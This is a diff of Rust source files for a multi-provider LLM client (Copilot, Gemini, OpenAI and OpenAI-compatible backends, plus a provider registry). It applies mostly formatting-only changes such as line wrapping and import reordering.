 
                 if let Some(arr) = items {
                     for item in arr {
-                        if item
-                            .get("model_picker_enabled")
-                            .and_then(|v| v.as_bool())
-                            == Some(false)
+                        if item.get("model_picker_enabled").and_then(|v| v.as_bool()) == Some(false)
                         {
                             continue;
                         }
@@ -1162,19 +1237,29 @@ impl LlmProvider for CopilotProvider {
                             }
                         }
                         if let Some(id) = item.get("id").and_then(|v| v.as_str()) {
-                            let name = item
-                                .get("name")
-                                .and_then(|v| v.as_str())
-                                .unwrap_or(id);
+                            let name = item.get("name").and_then(|v| v.as_str()).unwrap_or(id);
                             let ctx = item
                                 .get("context_window")
-                                .or_else(|| item.get("capabilities").and_then(|c| c.get("limits").and_then(|l| l.get("max_context_window_tokens"))))
-                                .or_else(|| item.get("capabilities").and_then(|c| c.get("limits").and_then(|l| l.get("max_prompt_tokens"))))
+                                .or_else(|| {
+                                    item.get("capabilities").and_then(|c| {
+                                        c.get("limits")
+                                            .and_then(|l| l.get("max_context_window_tokens"))
+                                    })
+                                })
+                                .or_else(|| {
+                                    item.get("capabilities").and_then(|c| {
+                                        c.get("limits").and_then(|l| l.get("max_prompt_tokens"))
+                                    })
+                                })
                                 .and_then(|v| v.as_u64())
                                 .unwrap_or(128_000) as u32;
                             let max_out = item
                                 .get("max_output_tokens")
-                                .or_else(|| item.get("capabilities").and_then(|c| c.get("limits").and_then(|l| l.get("max_output_tokens"))))
+                                .or_else(|| {
+                                    item.get("capabilities").and_then(|c| {
+                                        c.get("limits").and_then(|l| l.get("max_output_tokens"))
+                                    })
+                                })
                                 .and_then(|v| v.as_u64())
                                 .unwrap_or(16_384) as u32;
                             models.push(ModelInfo {

--- a/src-rust/crates/api/src/providers/google.rs
+++ b/src-rust/crates/api/src/providers/google.rs
@@ -15,7 +15,9 @@ use std::pin::Pin;
 use async_trait::async_trait;
 use bytes::Bytes;
 use claurst_core::provider_id::{ModelId, ProviderId};
-use claurst_core::types::{ContentBlock, Message, MessageContent, Role, ToolResultContent, UsageInfo};
+use claurst_core::types::{
+    ContentBlock, Message, MessageContent, Role, ToolResultContent, UsageInfo,
+};
 use futures::{Stream, StreamExt};
 use serde_json::{json, Value};
 use tracing::{debug, warn};
@@ -57,7 +59,10 @@ impl GoogleProvider {
 
     /// Returns true if the model supports thinking config (Gemini 2.5+ / 3.0+).
     fn supports_thinking(model: &str) -> bool {
-        model.contains("2.5") || model.contains("3.0") || model.contains("3.1") || model.contains("gemini-3")
+        model.contains("2.5")
+            || model.contains("3.0")
+            || model.contains("3.1")
+            || model.contains("gemini-3")
     }
 
     /// Build the full generateContent URL for non-streaming.
@@ -87,7 +92,11 @@ impl GoogleProvider {
                 }
             })
             .collect();
-        let base = if sanitized.is_empty() { "tool" } else { sanitized.as_str() };
+        let base = if sanitized.is_empty() {
+            "tool"
+        } else {
+            sanitized.as_str()
+        };
         if occurrence == 0 {
             format!("call_{}", base)
         } else {
@@ -201,10 +210,16 @@ impl GoogleProvider {
             ContentBlock::SystemAPIError { message, .. } => Some(json!({
                 "text": format!("[error] {}", message)
             })),
-            ContentBlock::CollapsedReadSearch { tool_name, paths, .. } => Some(json!({
+            ContentBlock::CollapsedReadSearch {
+                tool_name, paths, ..
+            } => Some(json!({
                 "text": format!("[{}] {}", tool_name, paths.join(", "))
             })),
-            ContentBlock::TaskAssignment { id, subject, description } => Some(json!({
+            ContentBlock::TaskAssignment {
+                id,
+                subject,
+                description,
+            } => Some(json!({
                 "text": format!("[task:{}] {}: {}", id, subject, description)
             })),
 
@@ -290,9 +305,7 @@ impl GoogleProvider {
                             let filtered: Vec<Value> = req_arr
                                 .into_iter()
                                 .filter(|v| {
-                                    v.as_str()
-                                        .map(|s| prop_keys.contains(s))
-                                        .unwrap_or(false)
+                                    v.as_str().map(|s| prop_keys.contains(s)).unwrap_or(false)
                                 })
                                 .collect();
                             map.insert("required".to_string(), Value::Array(filtered));
@@ -309,8 +322,10 @@ impl GoogleProvider {
                     if let Some(items) = map.get_mut("items") {
                         if let Value::Object(ref mut items_map) = items {
                             if !items_map.contains_key("type") {
-                                items_map
-                                    .insert("type".to_string(), Value::String("string".to_string()));
+                                items_map.insert(
+                                    "type".to_string(),
+                                    Value::String("string".to_string()),
+                                );
                             }
                             // Recurse sanitize into items.
                             let sanitized = Self::sanitize_schema(Value::Object(items_map.clone()));
@@ -417,18 +432,12 @@ impl GoogleProvider {
 
         // ---- Generation config ----
         let mut gen_config = serde_json::Map::new();
-        gen_config.insert(
-            "maxOutputTokens".to_string(),
-            json!(request.max_tokens),
-        );
+        gen_config.insert("maxOutputTokens".to_string(), json!(request.max_tokens));
         if let Some(temp) = request.temperature {
             gen_config.insert("temperature".to_string(), json!(temp));
         }
         if !request.stop_sequences.is_empty() {
-            gen_config.insert(
-                "stopSequences".to_string(),
-                json!(request.stop_sequences),
-            );
+            gen_config.insert("stopSequences".to_string(), json!(request.stop_sequences));
         }
         if let Some(top_p) = request.top_p {
             gen_config.insert("topP".to_string(), json!(top_p));
@@ -456,10 +465,7 @@ impl GoogleProvider {
         // ---- Assemble body ----
         let mut body = serde_json::Map::new();
         body.insert("contents".to_string(), Value::Array(contents));
-        body.insert(
-            "generationConfig".to_string(),
-            Value::Object(gen_config),
-        );
+        body.insert("generationConfig".to_string(), Value::Object(gen_config));
         if let Some(si) = system_instruction {
             body.insert("systemInstruction".to_string(), si);
         }
@@ -578,7 +584,6 @@ impl GoogleProvider {
             cache_read_input_tokens: 0,
         }
     }
-
 }
 
 // ---------------------------------------------------------------------------
@@ -646,10 +651,8 @@ impl LlmProvider for GoogleProvider {
     async fn create_message_stream(
         &self,
         request: ProviderRequest,
-    ) -> Result<
-        Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>,
-        ProviderError,
-    > {
+    ) -> Result<Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>, ProviderError>
+    {
         let url = self.stream_url(&request.model);
         let model = request.model.clone();
         let body = self.build_request_body(&request);
@@ -673,10 +676,10 @@ impl LlmProvider for GoogleProvider {
 
         let status = resp.status().as_u16();
         if status >= 400 {
-            let resp_body =
-                resp.text()
-                    .await
-                    .unwrap_or_else(|_| "<unreadable>".to_string());
+            let resp_body = resp
+                .text()
+                .await
+                .unwrap_or_else(|_| "<unreadable>".to_string());
             return Err(self.parse_error_response(status, &resp_body));
         }
 
@@ -903,10 +906,7 @@ impl LlmProvider for GoogleProvider {
     }
 
     async fn list_models(&self) -> Result<Vec<ModelInfo>, ProviderError> {
-        let url = format!(
-            "{}/v1beta/models?key={}",
-            self.base_url, self.api_key
-        );
+        let url = format!("{}/v1beta/models?key={}", self.base_url, self.api_key);
 
         let resp = self
             .http_client
@@ -933,13 +933,12 @@ impl LlmProvider for GoogleProvider {
             return Err(self.parse_error_response(status, &body_text));
         }
 
-        let body: Value =
-            serde_json::from_str(&body_text).map_err(|e| ProviderError::Other {
-                provider: self.id.clone(),
-                message: format!("Failed to parse models list JSON: {}", e),
-                status: Some(status),
-                body: Some(body_text.clone()),
-            })?;
+        let body: Value = serde_json::from_str(&body_text).map_err(|e| ProviderError::Other {
+            provider: self.id.clone(),
+            message: format!("Failed to parse models list JSON: {}", e),
+            status: Some(status),
+            body: Some(body_text.clone()),
+        })?;
 
         let models_array = body
             .get("models")
@@ -992,12 +991,10 @@ impl LlmProvider for GoogleProvider {
             Ok(_) => Ok(ProviderStatus::Degraded {
                 reason: "No Gemini models returned".to_string(),
             }),
-            Err(ProviderError::AuthFailed { message, .. }) => {
-                Err(ProviderError::AuthFailed {
-                    provider: self.id.clone(),
-                    message,
-                })
-            }
+            Err(ProviderError::AuthFailed { message, .. }) => Err(ProviderError::AuthFailed {
+                provider: self.id.clone(),
+                message,
+            }),
             Err(e) => Ok(ProviderStatus::Unavailable {
                 reason: e.to_string(),
             }),
@@ -1107,7 +1104,10 @@ mod tests {
         assert_eq!(contents.len(), 3);
         assert_eq!(contents[0]["role"], json!("user"));
         assert_eq!(contents[0]["parts"][0]["text"], json!("before"));
-        assert_eq!(contents[1]["parts"][0]["functionResponse"]["name"], json!("search"));
+        assert_eq!(
+            contents[1]["parts"][0]["functionResponse"]["name"],
+            json!("search")
+        );
         assert_eq!(contents[2]["parts"][0]["text"], json!("after"));
     }
 

--- a/src-rust/crates/api/src/providers/message_normalization.rs
+++ b/src-rust/crates/api/src/providers/message_normalization.rs
@@ -1,10 +1,7 @@
 use claurst_core::types::{ContentBlock, Message, MessageContent};
 
 pub(crate) fn remove_empty_messages(messages: &[Message]) -> Vec<Message> {
-    messages
-        .iter()
-        .filter_map(remove_empty_message)
-        .collect()
+    messages.iter().filter_map(remove_empty_message).collect()
 }
 
 pub(crate) fn normalize_anthropic_messages(messages: &[Message]) -> Vec<Message> {

--- a/src-rust/crates/api/src/providers/openai.rs
+++ b/src-rust/crates/api/src/providers/openai.rs
@@ -14,7 +14,6 @@
 //  - Health check
 //  - ProviderCapabilities
 
-use std::pin::Pin;
 use async_stream::stream;
 use async_trait::async_trait;
 use claurst_core::provider_id::{ModelId, ProviderId};
@@ -23,16 +22,17 @@ use claurst_core::types::{
 };
 use futures::Stream;
 use serde_json::{json, Value};
+use std::pin::Pin;
 use tracing::debug;
 
 use crate::error_handling::parse_error_response;
 use crate::provider::{LlmProvider, ModelInfo};
 use crate::provider_error::ProviderError;
+use crate::provider_types::SystemPrompt;
 use crate::provider_types::{
     ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason,
     StreamEvent, SystemPromptStyle,
 };
-use crate::provider_types::SystemPrompt;
 
 use super::request_options::merge_openai_compatible_options;
 
@@ -74,9 +74,7 @@ impl OpenAiProvider {
     /// Returns `true` if the model should use the Responses API instead of
     /// Chat Completions (gpt-5+, o3, o4-mini).
     fn use_responses_api(model: &str) -> bool {
-        model.starts_with("o3")
-            || model.starts_with("o4")
-            || model.starts_with("gpt-5")
+        model.starts_with("o3") || model.starts_with("o4") || model.starts_with("gpt-5")
     }
 
     // -----------------------------------------------------------------------
@@ -198,9 +196,7 @@ impl OpenAiProvider {
 
     fn user_block_to_openai_part(block: &ContentBlock) -> Option<Value> {
         match block {
-            ContentBlock::Text { text } => {
-                Some(json!({ "type": "text", "text": text }))
-            }
+            ContentBlock::Text { text } => Some(json!({ "type": "text", "text": text })),
             ContentBlock::Image { source } => {
                 let url = Self::image_source_to_url(source);
                 Some(json!({
@@ -208,7 +204,11 @@ impl OpenAiProvider {
                     "image_url": { "url": url }
                 }))
             }
-            ContentBlock::ToolResult { tool_use_id, content, is_error } => {
+            ContentBlock::ToolResult {
+                tool_use_id,
+                content,
+                is_error,
+            } => {
                 // Tool results become separate `role: tool` messages at the
                 // conversation level — handled in append_user_messages.
                 let _ = (tool_use_id, content, is_error);
@@ -224,18 +224,13 @@ impl OpenAiProvider {
             return url.clone();
         }
         // base64-encoded image
-        let media_type = source
-            .media_type
-            .as_deref()
-            .unwrap_or("image/png");
+        let media_type = source.media_type.as_deref().unwrap_or("image/png");
         let data = source.data.as_deref().unwrap_or("");
         format!("data:{};base64,{}", media_type, data)
     }
 
     /// Split assistant content blocks into (text_string, tool_calls_array).
-    fn assistant_content_to_openai(
-        content: &MessageContent,
-    ) -> (Option<String>, Vec<Value>) {
+    fn assistant_content_to_openai(content: &MessageContent) -> (Option<String>, Vec<Value>) {
         let blocks = match content {
             MessageContent::Text(t) => return (Some(t.clone()), vec![]),
             MessageContent::Blocks(b) => b,
@@ -320,9 +315,7 @@ impl OpenAiProvider {
     }
 
     /// Convert tool definitions to the OpenAI `tools` array format.
-    fn to_openai_tools(
-        tools: &[claurst_core::types::ToolDefinition],
-    ) -> Vec<Value> {
+    fn to_openai_tools(tools: &[claurst_core::types::ToolDefinition]) -> Vec<Value> {
         tools
             .iter()
             .map(|td| {
@@ -358,10 +351,7 @@ impl OpenAiProvider {
         &self,
         request: &ProviderRequest,
     ) -> Result<ProviderResponse, ProviderError> {
-        let messages = Self::to_openai_messages(
-            &request.messages,
-            request.system_prompt.as_ref(),
-        );
+        let messages = Self::to_openai_messages(&request.messages, request.system_prompt.as_ref());
         let tools = Self::to_openai_tools(&request.tools);
 
         let mut body = json!({
@@ -416,13 +406,12 @@ impl OpenAiProvider {
             return Err(self.map_http_error(status, &text));
         }
 
-        let json: Value =
-            serde_json::from_str(&text).map_err(|e| ProviderError::Other {
-                provider: self.id.clone(),
-                message: format!("Failed to parse response JSON: {}", e),
-                status: Some(status),
-                body: Some(text.clone()),
-            })?;
+        let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other {
+            provider: self.id.clone(),
+            message: format!("Failed to parse response JSON: {}", e),
+            status: Some(status),
+            body: Some(text.clone()),
+        })?;
 
         Self::parse_non_streaming_response(&json, &self.id)
     }
@@ -490,8 +479,7 @@ impl OpenAiProvider {
                     .and_then(|f| f.get("arguments"))
                     .and_then(|v| v.as_str())
                     .unwrap_or("{}");
-                let input: Value =
-                    serde_json::from_str(args_str).unwrap_or(json!({}));
+                let input: Value = serde_json::from_str(args_str).unwrap_or(json!({}));
                 content_blocks.push(ContentBlock::ToolUse { id, name, input });
             }
         }
@@ -533,10 +521,7 @@ impl OpenAiProvider {
             None => return UsageInfo::default(),
         };
         UsageInfo {
-            input_tokens: u
-                .get("prompt_tokens")
-                .and_then(|v| v.as_u64())
-                .unwrap_or(0),
+            input_tokens: u.get("prompt_tokens").and_then(|v| v.as_u64()).unwrap_or(0),
             output_tokens: u
                 .get("completion_tokens")
                 .and_then(|v| v.as_u64())
@@ -554,10 +539,7 @@ impl OpenAiProvider {
         &self,
         request: &ProviderRequest,
     ) -> Result<reqwest::Response, ProviderError> {
-        let messages = Self::to_openai_messages(
-            &request.messages,
-            request.system_prompt.as_ref(),
-        );
+        let messages = Self::to_openai_messages(&request.messages, request.system_prompt.as_ref());
         let tools = Self::to_openai_tools(&request.tools);
 
         let mut body = json!({
@@ -634,10 +616,19 @@ mod tests {
 
         let wire = OpenAiProvider::to_openai_messages(&messages, None);
         assert_eq!(wire.len(), 2);
-        assert_eq!(wire[0].get("role").and_then(|v| v.as_str()), Some("assistant"));
+        assert_eq!(
+            wire[0].get("role").and_then(|v| v.as_str()),
+            Some("assistant")
+        );
         assert_eq!(wire[1].get("role").and_then(|v| v.as_str()), Some("tool"));
-        assert_eq!(wire[1].get("tool_call_id").and_then(|v| v.as_str()), Some("call_1"));
-        assert_eq!(wire[1].get("content").and_then(|v| v.as_str()), Some("done"));
+        assert_eq!(
+            wire[1].get("tool_call_id").and_then(|v| v.as_str()),
+            Some("call_1")
+        );
+        assert_eq!(
+            wire[1].get("content").and_then(|v| v.as_str()),
+            Some("done")
+        );
     }
 
     #[test]
@@ -657,7 +648,10 @@ mod tests {
         assert_eq!(wire.len(), 2);
         assert_eq!(wire[0].get("role").and_then(|v| v.as_str()), Some("user"));
         assert_eq!(wire[1].get("role").and_then(|v| v.as_str()), Some("tool"));
-        assert_eq!(wire[1].get("tool_call_id").and_then(|v| v.as_str()), Some("call_2"));
+        assert_eq!(
+            wire[1].get("tool_call_id").and_then(|v| v.as_str()),
+            Some("call_2")
+        );
     }
 }
 
@@ -968,13 +962,12 @@ impl LlmProvider for OpenAiProvider {
             return Err(self.map_http_error(status, &text));
         }
 
-        let json: Value =
-            serde_json::from_str(&text).map_err(|e| ProviderError::Other {
-                provider: self.id.clone(),
-                message: format!("Failed to parse models JSON: {}", e),
-                status: Some(status),
-                body: Some(text),
-            })?;
+        let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other {
+            provider: self.id.clone(),
+            message: format!("Failed to parse models JSON: {}", e),
+            status: Some(status),
+            body: Some(text),
+        })?;
 
         let data = match json.get("data").and_then(|d| d.as_array()) {
             Some(d) => d,

--- a/src-rust/crates/api/src/providers/openai_compat.rs
+++ b/src-rust/crates/api/src/providers/openai_compat.rs
@@ -18,8 +18,8 @@ use crate::error_handling::parse_error_response;
 use crate::provider::{LlmProvider, ModelInfo};
 use crate::provider_error::ProviderError;
 use crate::provider_types::{
-    ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus,
-    StreamEvent, SystemPromptStyle,
+    ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent,
+    SystemPromptStyle,
 };
 
 // Re-use the message transformation helpers from openai.rs.
@@ -110,11 +110,7 @@ impl OpenAiCompatProvider {
     }
 
     /// Append a custom header sent on every request.
-    pub fn with_header(
-        mut self,
-        name: impl Into<String>,
-        value: impl Into<String>,
-    ) -> Self {
+    pub fn with_header(mut self, name: impl Into<String>, value: impl Into<String>) -> Self {
         self.extra_headers.push((name.into(), value.into()));
         self
     }
@@ -187,20 +183,11 @@ impl OpenAiCompatProvider {
     fn apply_fix_tool_user_sequence(messages: &mut Vec<Value>) {
         let mut i = 0;
         while i + 1 < messages.len() {
-            let current_is_tool = messages[i]
-                .get("role")
-                .and_then(|v| v.as_str())
-                == Some("tool");
-            let next_is_user = messages[i + 1]
-                .get("role")
-                .and_then(|v| v.as_str())
-                == Some("user");
+            let current_is_tool = messages[i].get("role").and_then(|v| v.as_str()) == Some("tool");
+            let next_is_user = messages[i + 1].get("role").and_then(|v| v.as_str()) == Some("user");
 
             if current_is_tool && next_is_user {
-                messages.insert(
-                    i + 1,
-                    json!({ "role": "assistant", "content": "Done." }),
-                );
+                messages.insert(i + 1, json!({ "role": "assistant", "content": "Done." }));
                 i += 2; // skip past the inserted message and the user message
             } else {
                 i += 1;
@@ -231,10 +218,7 @@ impl OpenAiCompatProvider {
     }
 
     /// Attach the authorization header if an API key is configured.
-    fn apply_auth(
-        &self,
-        builder: reqwest::RequestBuilder,
-    ) -> reqwest::RequestBuilder {
+    fn apply_auth(&self, builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder {
         if let Some(key) = &self.api_key {
             builder.header("Authorization", format!("Bearer {}", key))
         } else {
@@ -243,10 +227,7 @@ impl OpenAiCompatProvider {
     }
 
     /// Attach all configured extra headers.
-    fn apply_extra_headers(
-        &self,
-        mut builder: reqwest::RequestBuilder,
-    ) -> reqwest::RequestBuilder {
+    fn apply_extra_headers(&self, mut builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder {
         for (name, value) in &self.extra_headers {
             builder = builder.header(name.as_str(), value.as_str());
         }
@@ -320,13 +301,12 @@ impl OpenAiCompatProvider {
             return Err(self.map_http_error(status, &text));
         }
 
-        let json: Value =
-            serde_json::from_str(&text).map_err(|e| ProviderError::Other {
-                provider: self.id.clone(),
-                message: format!("Failed to parse response JSON: {}", e),
-                status: Some(status),
-                body: Some(text.clone()),
-            })?;
+        let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other {
+            provider: self.id.clone(),
+            message: format!("Failed to parse response JSON: {}", e),
+            status: Some(status),
+            body: Some(text.clone()),
+        })?;
 
         OpenAiProvider::parse_non_streaming_response_pub(&json, &self.id)
     }
@@ -705,13 +685,12 @@ impl LlmProvider for OpenAiCompatProvider {
             return Err(self.map_http_error(status, &text));
         }
 
-        let json: Value =
-            serde_json::from_str(&text).map_err(|e| ProviderError::Other {
-                provider: self.id.clone(),
-                message: format!("Failed to parse models JSON: {}", e),
-                status: Some(status),
-                body: Some(text),
-            })?;
+        let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other {
+            provider: self.id.clone(),
+            message: format!("Failed to parse models JSON: {}", e),
+            status: Some(status),
+            body: Some(text),
+        })?;
 
         let data = match json.get("data").and_then(|d| d.as_array()) {
             Some(d) => d,

--- a/src-rust/crates/api/src/providers/openai_compat_providers.rs
+++ b/src-rust/crates/api/src/providers/openai_compat_providers.rs
@@ -17,31 +17,27 @@ use super::openai_compat::{OpenAiCompatProvider, ProviderQuirks};
 /// Ollama — local inference server.
 /// Reads `OLLAMA_HOST` for the base URL; defaults to `http://localhost:11434`.
 pub fn ollama() -> OpenAiCompatProvider {
-    let host = std::env::var("OLLAMA_HOST")
-        .unwrap_or_else(|_| "http://localhost:11434".to_string());
+    let host =
+        std::env::var("OLLAMA_HOST").unwrap_or_else(|_| "http://localhost:11434".to_string());
     let base_url = format!("{}/v1", host.trim_end_matches('/'));
-    OpenAiCompatProvider::new(ProviderId::OLLAMA, "Ollama", base_url).with_quirks(
-        ProviderQuirks {
-            overflow_patterns: vec![
-                "prompt too long".to_string(),
-                "exceeded.*context length".to_string(),
-            ],
-            ..Default::default()
-        },
-    )
+    OpenAiCompatProvider::new(ProviderId::OLLAMA, "Ollama", base_url).with_quirks(ProviderQuirks {
+        overflow_patterns: vec![
+            "prompt too long".to_string(),
+            "exceeded.*context length".to_string(),
+        ],
+        ..Default::default()
+    })
 }
 
 /// LM Studio — local OpenAI-compatible server.
 /// Reads `LM_STUDIO_HOST` for the base URL; defaults to `http://localhost:1234`.
 pub fn lm_studio() -> OpenAiCompatProvider {
-    let host = std::env::var("LM_STUDIO_HOST")
-        .unwrap_or_else(|_| "http://localhost:1234".to_string());
+    let host =
+        std::env::var("LM_STUDIO_HOST").unwrap_or_else(|_| "http://localhost:1234".to_string());
     let base_url = format!("{}/v1", host.trim_end_matches('/'));
     OpenAiCompatProvider::new(ProviderId::LM_STUDIO, "LM Studio", base_url).with_quirks(
         ProviderQuirks {
-            overflow_patterns: vec![
-                "greater than the context length".to_string(),
-            ],
+            overflow_patterns: vec!["greater than the context length".to_string()],
             ..Default::default()
         },
     )
@@ -50,14 +46,12 @@ pub fn lm_studio() -> OpenAiCompatProvider {
 /// llama.cpp — lightweight C++ inference server.
 /// Reads `LLAMA_CPP_HOST` for the base URL; defaults to `http://localhost:8080`.
 pub fn llama_cpp() -> OpenAiCompatProvider {
-    let host = std::env::var("LLAMA_CPP_HOST")
-        .unwrap_or_else(|_| "http://localhost:8080".to_string());
+    let host =
+        std::env::var("LLAMA_CPP_HOST").unwrap_or_else(|_| "http://localhost:8080".to_string());
     let base_url = format!("{}/v1", host.trim_end_matches('/'));
     OpenAiCompatProvider::new(ProviderId::LLAMA_CPP, "llama.cpp", base_url).with_quirks(
         ProviderQuirks {
-            overflow_patterns: vec![
-                "exceeds the available context size".to_string(),
-            ],
+            overflow_patterns: vec!["exceeds the available context size".to_string()],
             ..Default::default()
         },
     )
@@ -91,9 +85,7 @@ pub fn groq() -> OpenAiCompatProvider {
     OpenAiCompatProvider::new(ProviderId::GROQ, "Groq", "https://api.groq.com/openai/v1")
         .with_api_key(key)
         .with_quirks(ProviderQuirks {
-            overflow_patterns: vec![
-                "reduce the length of the messages".to_string(),
-            ],
+            overflow_patterns: vec!["reduce the length of the messages".to_string()],
             include_usage_in_stream: true,
             ..Default::default()
         })
@@ -390,12 +382,8 @@ pub fn upstage() -> OpenAiCompatProvider {
 /// StepFun — Step models.  Reads `STEPFUN_API_KEY`.
 pub fn stepfun() -> OpenAiCompatProvider {
     let key = std::env::var("STEPFUN_API_KEY").unwrap_or_default();
-    OpenAiCompatProvider::new(
-        ProviderId::STEPFUN,
-        "StepFun",
-        "https://api.stepfun.com/v1",
-    )
-    .with_api_key(key)
+    OpenAiCompatProvider::new(ProviderId::STEPFUN, "StepFun", "https://api.stepfun.com/v1")
+        .with_api_key(key)
 }
 
 /// Fireworks AI — fast inference.  Reads `FIREWORKS_API_KEY`.

--- a/src-rust/crates/api/src/providers/request_options.rs
+++ b/src-rust/crates/api/src/providers/request_options.rs
@@ -97,16 +97,17 @@ pub(crate) fn merge_bedrock_options(body: &mut Value, provider_options: &Value) 
 
     for (key, value) in options_obj {
         match key.as_str() {
-            "inferenceConfig" | "toolConfig" | "reasoningConfig" | "additionalModelRequestFields" => {
-                match (body_obj.get_mut(key), value) {
-                    (Some(Value::Object(target_obj)), Value::Object(source_obj)) => {
-                        merge_maps(target_obj, source_obj);
-                    }
-                    _ => {
-                        body_obj.insert(key.clone(), value.clone());
-                    }
+            "inferenceConfig"
+            | "toolConfig"
+            | "reasoningConfig"
+            | "additionalModelRequestFields" => match (body_obj.get_mut(key), value) {
+                (Some(Value::Object(target_obj)), Value::Object(source_obj)) => {
+                    merge_maps(target_obj, source_obj);
                 }
-            }
+                _ => {
+                    body_obj.insert(key.clone(), value.clone());
+                }
+            },
             _ => {
                 body_obj.insert(key.clone(), value.clone());
             }
@@ -154,7 +155,10 @@ mod tests {
             }),
         );
 
-        assert_eq!(body["generationConfig"]["thinkingConfig"]["thinkingLevel"], json!("high"));
+        assert_eq!(
+            body["generationConfig"]["thinkingConfig"]["thinkingLevel"],
+            json!("high")
+        );
         assert_eq!(body["cachedContent"], json!("abc"));
     }
 

--- a/src-rust/crates/api/src/registry.rs
+++ b/src-rust/crates/api/src/registry.rs
@@ -27,9 +27,10 @@ fn provider_from_key(provider_id: &str, key: String) -> Option<Arc<dyn LlmProvid
     use crate::providers::openai_compat_providers as p;
 
     match provider_id {
-        "anthropic" => Some(Arc::new(AnthropicProvider::from_config(
-            ClientConfig { api_key: key, ..Default::default() },
-        ))),
+        "anthropic" => Some(Arc::new(AnthropicProvider::from_config(ClientConfig {
+            api_key: key,
+            ..Default::default()
+        }))),
         "openai" => Some(Arc::new(OpenAiProvider::new(key))),
         "google" => Some(Arc::new(GoogleProvider::new(key))),
         "github-copilot" => Some(Arc::new(CopilotProvider::new(key))),
@@ -286,85 +287,166 @@ impl ProviderRegistry {
         self.register(Arc::new(p::llama_cpp()));
 
         // Remote providers — only register when an API key is present.
-        if std::env::var("DEEPSEEK_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("DEEPSEEK_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::deepseek()));
         }
-        if std::env::var("GROQ_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("GROQ_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::groq()));
         }
-        if std::env::var("XAI_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("XAI_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::xai()));
         }
-        if std::env::var("OPENROUTER_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("OPENROUTER_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::openrouter()));
         }
-        if std::env::var("TOGETHER_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("TOGETHER_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::together_ai()));
         }
-        if std::env::var("PERPLEXITY_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("PERPLEXITY_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::perplexity()));
         }
-        if std::env::var("CEREBRAS_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("CEREBRAS_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::cerebras()));
         }
-        if std::env::var("DEEPINFRA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("DEEPINFRA_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::deepinfra()));
         }
-        if std::env::var("VENICE_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("VENICE_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::venice()));
         }
-        if std::env::var("DASHSCOPE_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("DASHSCOPE_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::qwen()));
         }
-        if std::env::var("MISTRAL_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("MISTRAL_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::mistral()));
         }
-        if std::env::var("SAMBANOVA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("SAMBANOVA_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::sambanova()));
         }
-        if std::env::var("HF_TOKEN").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("HF_TOKEN")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::huggingface()));
         }
-        if std::env::var("NVIDIA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("NVIDIA_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::nvidia()));
         }
-        if std::env::var("SILICONFLOW_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("SILICONFLOW_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::siliconflow()));
         }
-        if std::env::var("MOONSHOT_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("MOONSHOT_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::moonshot()));
         }
-        if std::env::var("ZHIPU_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("ZHIPU_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::zhipu()));
         }
-        if std::env::var("NEBIUS_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("NEBIUS_API_KEY")
